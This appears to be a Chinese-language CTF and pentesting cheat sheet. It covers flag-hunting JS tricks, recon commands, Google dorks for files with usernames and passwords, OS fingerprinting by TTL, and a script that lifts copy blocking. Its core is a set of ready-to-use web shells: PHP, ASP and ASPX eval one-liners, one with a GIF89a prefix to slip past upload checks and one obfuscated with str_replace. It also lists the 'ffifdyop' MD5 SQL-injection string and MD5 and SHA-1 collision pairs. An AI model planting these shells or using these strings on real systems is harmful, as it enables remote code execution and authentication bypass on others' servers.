JavaScript:

¶js的三种弹出提示框:

alert("flag");	// 会弹出警告框和一个按钮
confirm("flag");	// 显示一个“确定”和“取消”按钮的对话框, 后可接上判断语句
prompt("flag");		// 显示一个对话框, 可以输入文本
fillText('flag',x,y);	// 指定地点绘制文本

一般来说前端程序是js就可以先尝试这些来找到flag, 找到了看不懂或者里面堆着一大堆就尝试一下复制到控制台运行一下

¶js前端过滤

你可以在网页禁用js来解除前端过滤, 不仅如此, 假如是js前端鉴权, 你可以随意越权访问

kali命令查找子域名和ip地址

dnsenum
whois
Dig
nslookup www.baidu.com

DNS更新记录解析

修改 ping 时的 ttl 值

netsh interface ipv4 **set** global defaultcurhoplimit=64

#　Google hack

inurl:pdf 计算机 site:baidu.com 指定网站内包含计算机字符串的pdf
filetype:xls “username | password” 查找xls文件要包含usernam或password
site:mit.edu filetype:pdf net security 指定网站查找与"网络安全"相关的 PDF 文件

CDN

无法使用主动扫描 https://ping.chinaz.com 可以查看baidu各地的CDN

信息收集软件, 开源情报收集和取证

Maltego
sn0int
ZoomEye

vim

vim编辑ReadOnly不能保存? 退出编辑模式后输入:w !sudo tee %进行保存，之后再使用:q!退出即可

openssl

openssl passwd -1

一句话木马

// php一句话
<?php @eval($_POST['2333']); ?>

// js一句话
GIF89a?
<script language="php">eval($_POST["2333"]);</script>

// 短标签
<?=eval($_POST['a']);?>
<?=phpinfo();?>

// 关键词绕过php
GIF89a
<?php
    $a = str_replace("b", "", "absbsbebrbt");
    $a($_POST['x']);
?>

// asp一句话
<%eval requset("cmd")%>

// aspx一句话
<%@ Page Language="Jscript"%>
<%eval(Request.Item["cmd"],"unsafe");%>

md5:

¶加密后变成sql注入的:

ffifdyop
129581926211651571912466741651878684928

¶碰撞的:

我还是更推荐 fastcoll 工具直接生成

a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

TTL判断系统类型

系统类型	ping-TTL返回值
windows 2000	128
linux	64
windows NT	107
windows 9x	128 / 107
Solaris	252
IRIX	240
AIR	247

OWASP

开放式Web应用程序安全项目

某种意义上也是为渗透提供了攻击思路

网页禁止右键解除


(function() {
    var doc = document,
    bd = doc.body;
    bd.onselectstart = bd.oncopy = bd.onpaste = bd.onkeydown = bd.oncontextmenu = bd.onmousemove = bd.onselectstart = bd.ondragstart = doc.onselectstart = doc.oncopy = doc.onpaste = doc.onkeydown = doc.oncontextmenu = null;
    doc.onselectstart = doc.oncontextmenu = doc.onmousedown = doc.onkeydown = function() {
        return true;
    };
    with (doc.wrappedJSObject || doc) {
        onmouseup = null;
        onmousedown = null;
        oncontextmenu = null;
    };
    var allElements = doc.getElementsByTagName('*');
    for (var i = allElements.length; i > 0;) {
        var elmOne = allElements[--i];
        with (elmOne.wrappedJSObject || elmOne) {
            onmouseup = null;
            onmousedown = null;
        };
    };
    alert('已解除复制与右键限制');
    bd.style.webkitUserSelect = 'auto!important';
    bd.style.MozUserSelect = 'normal!important';
})();

系统程序格式

linux运行程序格式是elf,windows是exe

sh1

¶碰撞

a=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1
b=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1

a=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1
b=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1